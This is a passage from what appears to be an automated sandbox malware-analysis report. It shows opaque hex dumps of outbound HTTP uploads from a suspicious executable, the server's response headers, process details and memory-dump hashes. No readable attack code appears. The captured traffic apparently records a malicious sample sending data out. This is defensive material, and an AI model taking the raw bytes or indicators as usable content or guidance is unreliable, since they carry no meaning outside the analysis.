                                                                                                                                  2024-12-20 16:05:56 UTC15331OUTData Raw: 60 88 08 40 68 01 0a d6 47 51 2e fc f7 6f 6e cc b1 bf 8f 55 52 e3 81 d3 99 bf 0d 9e 1e 90 3d bd 68 8a 18 00 41 30 21 17 e1 01 a8 05 d2 18 30 f3 1d ab d5 8d b0 a9 bd d2 e0 f5 0e 55 1e 4e ef 17 9e 19 49 d0 9d 14 5e 0e b6 9c cc e9 52 a4 ae dc 02 2c e2 da de e1 8f 23 40 f3 23 c8 aa af 55 18 e5 2a 82 12 b5 61 eb 06 15 88 5a 59 46 a5 50 62 c2 05 81 0e ac 73 9d e7 22 c8 9d a3 fb 4f 5f b4 d9 ed a4 90 55 6f 00 f4 23 0d c4 9f 11 13 2f 67 2f 27 b5 2f 3f 71 93 e0 bb b1 3b 75 fe 24 66 6e b2 8a 9c c0 71 6a cb 4c 40 a1 09 4e ca 3f dc ae 03 a4 2f 62 42 f9 36 00 d6 3b 31 3b 63 07 98 3a 45 f7 52 5e b4 ab 60 b9 b3 55 5c b6 bf 9e 70 65 4d b4 d6 1e b9 fe a6 c0 6f 53 e4 d7 f0 27 ed 88 cb 9d d5 d1 b1 15 f2 dd 4b 91 04 6c 98 8d 14 ea 53 f3 2d 82 c4 dd 0e 0d b3 1e 2b 9e 6d 8e 9f
                                                                                                                                  Data Ascii: `@hGQ.onUR=hA0!0UNI^R,#@#U*aZYFPbs"O_Uo#/g/'/?q;u$fnqjL@N?/bB6;1;c:ER^`U\peMoS'KlS-+m
                                                                                                                                  2024-12-20 16:05:56 UTC15331OUTData Raw: 5f 9c 71 db 56 42 2f dd cc 78 4f 2e 97 f3 ac bb 85 01 81 6d 97 b1 3f 1c bd ce 35 1d e0 b0 18 ee 8f 9e 47 63 76 13 76 83 5a af c5 f5 32 dd 11 c7 57 96 bd c1 ee ba ed 5b 5b 46 5d 91 ce d9 05 56 bb d7 fb 72 7b 00 43 be f2 a9 3e a5 84 45 4a b2 28 e1 9a 2e f8 6d 77 10 17 f2 1f 37 eb 95 87 5d 38 fb d6 ff b6 2a a8 f9 90 18 0a ab 44 26 f4 06 62 5c 76 b0 7d 3d e5 cb df 92 50 9e 31 dd dd a5 1b 68 7f 02 59 79 f3 57 59 2a 07 c7 94 1a c3 96 8e 7e 66 7b e1 16 d3 a4 44 56 c9 76 9c 7e 47 b2 7c e7 01 86 f6 f8 c7 13 47 13 23 87 4f 69 e2 75 56 2a ae b0 fc 7f 99 be 98 ba b8 1d cb c6 ad b3 fa 2a 19 9c e5 99 42 f7 f6 d4 1f 75 a2 73 6b 53 52 1d fd a9 97 75 37 9f 0d 0c 83 be fe 67 a6 15 ef 0f 28 43 9a bd 5b e4 69 5e 79 d3 c7 f2 e5 4e cc 41 ff d7 8f 98 75 17 e7 32 63 e4 2b fe 55
                                                                                                                                  Data Ascii: _qVB/xO.m?5GcvvZ2W[[F]Vr{C>EJ(.mw7]8*D&b\v}=P1hYyWY*~f{DVv~G|G#OiuV**BuskSRu7g(C[i^yNAu2c+U
                                                                                                                                  2024-12-20 16:05:56 UTC15331OUTData Raw: 2d 14 12 ae 3d 54 6d 71 4f fd aa 20 b6 79 a0 2f f4 46 6a 61 c7 fd 19 c6 c1 12 e8 21 33 95 7d 63 72 d2 c2 2a 73 69 0b bf a2 d1 de a2 c5 de 8c 36 b0 e0 7a 39 f7 16 dd fa 40 0d 88 ce 1e 39 18 ed 5f 77 97 7b d6 ed c6 ec 82 73 00 3a 4f 8b 97 7b 6b f1 6f fd 69 35 88 34 64 9b f2 10 b1 87 5e 40 68 d2 3d a6 cd 2e 8a 76 4c 5d 66 a3 18 1d 1e 7c 63 c0 7c 28 d2 8b fb aa 6b b3 b1 dc 83 d1 20 cf 27 3e a3 0b ba 31 dc c2 3f ab 8a 32 19 66 e9 0a 83 dc 88 fe 8e d4 a9 49 cc 2b c5 19 de ad 0c 3d e9 2d 8a 3a d8 d0 ce 45 65 90 53 68 eb b8 4a 87 4a 6c cc 00 81 81 c2 31 cf e0 e0 67 9f fd b1 54 24 2a cf 9b 13 63 ee a0 2d 25 70 e2 17 68 ad 0f 3b 0d a8 59 d4 30 d5 d6 22 42 6e 18 bf 51 c1 6d f2 48 4e a2 3c 9e 64 65 e6 40 ca bd 40 1c 57 3e c3 b4 0f 1c 5a ad 18 c5 fe 3f de a8 01 30 f8
                                                                                                                                  Data Ascii: -=TmqO y/Fja!3}cr*si6z9@9_w{s:O{koi54d^@h=.vL]f|c|(k '>1?2fI+=-:EeShJJl1gT$*c-%ph;Y0"BnQmHN<de@@W>Z?0
                                                                                                                                  2024-12-20 16:05:56 UTC15331OUTData Raw: 0e 98 8e 1f 34 91 85 e2 84 d6 0b 93 98 5f 4a 78 05 54 ef 43 71 47 81 8b d2 d4 15 5e f1 c3 04 34 05 cd 91 60 db b2 7e e7 38 f5 9f 2e 2b 0d a1 fb 81 f9 9e a9 5c 01 34 43 ef b8 05 44 cd a4 e4 d9 09 49 37 03 83 de bd 5f 8e d9 3e 0c 4e a1 93 f5 7a ad 8a 07 6b 28 53 fc b5 5a ab 36 83 d7 0b f2 9a 04 92 3e 29 56 54 3c 8e 32 65 60 7d 07 46 2f da 83 27 08 6b e2 23 9a ee 05 d3 18 54 c7 9d 7b 99 e6 c8 92 26 80 69 31 4c f3 6e 80 df d9 f7 a3 69 72 e2 d6 d3 2c 0b d0 75 c0 5c a6 ec e8 7b 53 04 12 e3 77 33 0f b5 e7 01 ea cc 0f cb a4 45 ca ce 76 91 14 b1 f0 33 97 0e 98 a4 4c 7f c2 83 73 bf cf bd b2 eb 0f 3a f5 9a d4 af 01 96 fe a6 7c a9 c9 05 28 ad 4c e6 d7 96 3f 06 0c d3 9f 07 c0 05 62 a2 e5 88 3e 48 d4 4c 40 51 42 f4 78 77 a8 77 f2 fe 5c cc b5 df 5f 32 03 96 2d 15 19 25
                                                                                                                                  Data Ascii: 4_JxTCqG^4`~8.+\4CDI7_>Nzk(SZ6>)VT<2e`}F/'k#T{&i1Lnir,u\{Sw3Ev3Ls:|(L?b>HL@QBxww\_2-%
                                                                                                                                  2024-12-20 16:05:56 UTC15331OUTData Raw: 6f e9 81 cd 55 c3 30 89 ee 36 27 23 b1 ee 76 f1 d4 d2 bd d9 69 b5 c7 b2 dd ca f6 64 53 27 92 56 38 70 a5 2a 5b 71 f5 b9 c8 66 f4 74 3e f2 56 70 c6 99 67 90 e7 7a 02 b5 46 b9 62 aa f3 f1 41 54 95 7a b6 c6 03 4e 62 f1 5e f6 60 52 33 7d b4 c4 d8 42 1b b0 46 e2 74 0d a4 74 c5 b7 37 82 6a ed 7f 15 2f 89 97 03 45 82 b5 d6 af 97 f6 9e 6e da f9 fa 3d fc d5 b7 7d 59 08 fc 71 39 29 5b 7c 3c c9 73 e3 a7 72 67 ee 95 e8 8c fb 6f 7e cb d1 ac 99 a2 36 55 1d 3b 34 3f 56 bf e7 e4 6d ea b3 36 e1 aa 6b 16 4a 2a 87 11 f0 97 b4 b5 3c ee a4 d2 fa 5f a7 ca 17 1e 20 6c ee 71 de 59 ce e4 d2 d1 59 59 70 4b 45 97 a9 91 fe ab 63 1b 81 9b dc 5e 21 14 f0 2f 9e de cf 0d e7 ab 7f 15 30 76 42 d4 ab 14 78 f3 c7 f7 ea 4b 76 d4 13 03 b7 66 64 18 6e ba c0 f6 52 6d 71 a1 4e f0 94 5b a6 d6 af
                                                                                                                                  Data Ascii: oU06'#vidS'V8p*[qft>VpgzFbATzNb^`R3}BFtt7j/En=}Yq9)[|<srgo~6U;4?Vm6kJ*<_ lqYYYpKEc^!/0vBxKvfdnRmqN[
                                                                                                                                  2024-12-20 16:05:56 UTC15331OUTData Raw: 22 67 c5 cd 60 9d f2 46 96 72 73 69 4e 94 5e 08 12 97 fa 2c 0b 02 c1 6c 2b 9d b1 97 fb 3c 06 c0 3f af 36 9b c7 cd 55 7f 58 a3 d4 a6 c0 92 d1 ec cf 7b f4 d9 ed fc 8a 1d 1f f7 e8 7a 13 43 21 cd 03 81 ab d0 f8 3b 2c ea 4e 7b 60 55 c3 3d 72 58 86 f0 60 50 64 98 01 27 e1 95 72 22 13 a6 a1 42 2e 35 99 b6 6c e6 a9 09 ff fb 05 9a df 9b f2 74 48 82 4c d2 7d b0 7c ba 17 9a 54 a1 9b fd de 1b 98 ef 95 1a bc bd 3a 1f 8c 04 f4 eb 24 cd dd a7 35 14 df cf 5f 2c 20 90 3d af 40 57 fc fd 38 81 aa 38 10 86 4f 57 9c e4 40 60 f4 ee 93 ef 19 cb b9 a4 44 8f ac 07 c5 a8 25 bd 7c 0d dc ce 77 e9 30 b6 02 51 a3 7c 6e 3c f5 eb b3 d4 9d cc 7a 85 76 55 d2 fc de b0 ca df 27 7d 2e 7d e0 68 1c 55 55 3c 18 b9 d3 ee 22 9a ee 2a f2 e2 fd cd 25 4a ea d7 a5 cd 1d 30 97 8d 8a e9 4b 58 16 4c a1
                                                                                                                                  Data Ascii: "g`FrsiN^,l+<?6UX{zC!;,N{`U=rX`Pd'r"B.5ltHL}|T:$5_, =@W88OW@`D%|w0Q|n<zvU'}.}hUU<"*%J0KXL
                                                                                                                                  2024-12-20 16:05:56 UTC15331OUTData Raw: c5 8f 91 92 35 57 a7 4c 39 5a de 7f 79 e1 8d 4d 2e a9 7a a4 cf 87 4e 59 6b bd 8b 2c bd d3 e0 ff 7f 63 44 ee 17 1d 40 f5 7b e8 0f f4 f8 74 6a 9e b5 a1 a5 48 2f 7d 8d 7a f4 66 f2 b9 6f a2 67 a1 9b 30 48 d7 c3 b5 52 af 1d 17 c1 84 4b 73 69 c4 4b fb d1 07 57 0a e9 19 b9 97 fe 1d f8 7c af d8 5c 80 73 7d c9 b1 d1 38 e6 ff 9c a9 97 02 ab 23 53 72 28 70 0a d7 cb f7 3f 74 8e 6a ae a3 6a 7c 93 ea a3 1c 55 17 7d 19 1b 17 24 3a ee 0a f3 23 66 8b b8 60 0b c1 b5 99 d9 79 24 f3 e6 4d cd c7 35 be ad b5 d2 42 ad fb 60 09 cc 29 7a 8f 30 72 09 e0 68 37 e9 37 19 c6 20 d9 4b 00 74 29 b8 1c 17 be dd 97 c0 cb 7e 29 80 23 3a fe 8d 7b fd fe 60 a3 09 22 98 ed fe 72 db 36 24 08 7c eb 25 be 2a 42 df 89 1a 95 ed 41 82 65 bc 70 3a f6 26 01 c3 48 46 88 01 84 30 62 d1 32 65 ed 12 2b 23
                                                                                                                                  Data Ascii: 5WL9ZyM.zNYk,cD@{tjH/}zfog0HRKsiKW|\s}8#Sr(p?tjj|U}$:#f`y$M5B`)z0rh77 Kt)~)#:{`"r6$|%*BAep:&HF0b2e+#
                                                                                                                                  2024-12-20 16:05:56 UTC15331OUTData Raw: 4a 28 d3 04 5e 4c 68 57 44 ed 6c 0d d3 d9 b1 7c 7e 73 ec e8 1c da 3f fa d7 26 fd 90 63 d9 01 73 41 d6 c2 cd 34 1e fc 9a 2a 16 f2 df 18 35 ec 53 f0 d2 0a f0 71 34 ff ba 49 4a 3b d0 77 5c c9 a4 a1 5c 8e d3 57 fe 41 20 bb 72 3d 55 91 77 6e 74 6b 23 7c aa fe 5c fe d7 1c 54 79 4a 51 a2 2a d1 b1 95 65 ce f3 2b 4e 74 f6 a7 b2 1e ce d2 ec ff 9b 9b da b4 75 41 f0 ff ab e7 ab 68 6e a1 47 38 48 e0 fe cf bd e5 3c 73 26 31 e6 f7 52 a5 35 c5 05 5b 89 a9 22 5f af dc 1a 37 d6 45 e3 8d 3e 8a ea 23 cf 88 e6 e1 cf 36 26 8b 27 85 b4 45 b6 1a b4 86 7e 31 30 32 a5 2f a5 dd c8 c1 10 f5 f6 08 d8 49 29 c5 e4 d9 c6 4f 98 80 f7 4c df 09 c7 e9 a2 68 90 17 5b f3 ef 21 8f 91 3a 90 ff f7 d8 12 22 95 c0 5c f6 43 f2 b3 20 39 f4 03 d2 3d d5 f6 bd a8 82 8f 83 bd c4 83 c1 1a 98 97 08 f8 d5
                                                                                                                                  Data Ascii: J(^LhWDl|~s?&csA4*5Sq4IJ;w\\WA r=Uwntk#|\TyJQ*e+NtuAhnG8H<s&1R5["_7E>#6&'E~102/I)OLh[!:"\C 9=
                                                                                                                                  2024-12-20 16:06:02 UTC1135INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 20 Dec 2024 16:06:02 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Set-Cookie: PHPSESSID=vgh77nekbpq5so8k34f868qmcf; expires=Tue, 15 Apr 2025 09:52:41 GMT; Max-Age=9999999; path=/
                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=000ugNzlNqdpS5h%2BFm9I2H%2Fa7h%2B29HcvdGNBLDP48uuzNv5x7ABHhSmqIcj67OJPJO9573ianWzkYN5DJ1of9pFLmEQE6MUn%2BogwpjUr0Oy2Vf44FCGFnI1hbwewLgjC8w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f50e0761904422e-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1672&rtt_var=639&sent=318&recv=576&lost=0&retrans=0&sent_bytes=2832&recv_bytes=553834&delivery_rate=1746411&cwnd=252&unsent_bytes=0&cid=3234595636c0d4da&ts=5915&x=0"



                                                                                                                                  Target ID:0
                                                                                                                                  Start time:11:05:31
                                                                                                                                  Start date:20/12/2024
                                                                                                                                  Path:C:\Users\user\Desktop\zhQFKte2vX.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\zhQFKte2vX.exe"
                                                                                                                                  Imagebase:0x4e0000
                                                                                                                                  File size:1'819'648 bytes
                                                                                                                                  MD5 hash:157A5AF38553CCB117F6D278B2B046F0
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000003.1638470315.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, Offset: 011E1000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_3_11dc000_zhQFKte2vX.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ba93a44016a83daf518b449d2e22cbc6130683bfa9714774ebd69bd2fe7e5c3f
                                                                                                                                    • Instruction ID: 6aa5703a119231a14ef044859a08fef3a98661ff1d97e3a9f0c8209e417b967b
                                                                                                                                    • Opcode Fuzzy Hash: ba93a44016a83daf518b449d2e22cbc6130683bfa9714774ebd69bd2fe7e5c3f
                                                                                                                                    • Instruction Fuzzy Hash: 4602026540EBC04FD71B8BB44D79892BFB0AD2311474E86DFC8C68F8A3D359994AD326
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000003.1638470315.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, Offset: 011E1000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_3_11dc000_zhQFKte2vX.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e34e3818d2e4a05e1d7934b98af4bb572172bdc583d7428c0a804747e521fd61
                                                                                                                                    • Instruction ID: 38d7baca993a97aefa858cce6e49b8d46b7557a703e818728f6297c699cda7f7
                                                                                                                                    • Opcode Fuzzy Hash: e34e3818d2e4a05e1d7934b98af4bb572172bdc583d7428c0a804747e521fd61
                                                                                                                                    • Instruction Fuzzy Hash: BA41B96640EBD05FDB1B47B45869195BFB0AE1722934F86CBC0C1CF4A7E299490AC723
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000003.1637773020.00000000011DC000.00000004.00000020.00020000.00000000.sdmp, Offset: 011DC000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_3_11dc000_zhQFKte2vX.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5283c0e2827716c8915a326193a451e2c01a2b5240456fb688a8e05bb3d767ea
                                                                                                                                    • Instruction ID: 01ea53c28b2e2a129a5f9bff757b4dc62c689aa5c9be8f580ca5acfaad91fd08
                                                                                                                                    • Opcode Fuzzy Hash: 5283c0e2827716c8915a326193a451e2c01a2b5240456fb688a8e05bb3d767ea
                                                                                                                                    • Instruction Fuzzy Hash: 6871D15A44E3C21FD71B8B348DB9491BF706D2311430E86DFC8C68F8A3D3589A4AD366
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000003.1750449872.0000000001258000.00000004.00000020.00020000.00000000.sdmp, Offset: 01259000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_3_1259000_zhQFKte2vX.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ca3cd716d5540b57b4bc424605a9b1057fbe30a8598e4be71706c9fa949fbf49
                                                                                                                                    • Instruction ID: a39d606bf747d5a61088a420b889903078fb1d9be974dcd4358c3efd59968945
                                                                                                                                    • Opcode Fuzzy Hash: ca3cd716d5540b57b4bc424605a9b1057fbe30a8598e4be71706c9fa949fbf49
                                                                                                                                    • Instruction Fuzzy Hash: A521039680E3C11FD7138B744D39641BFB46E23215B1E8ADFC4C68A5E3E358950AD723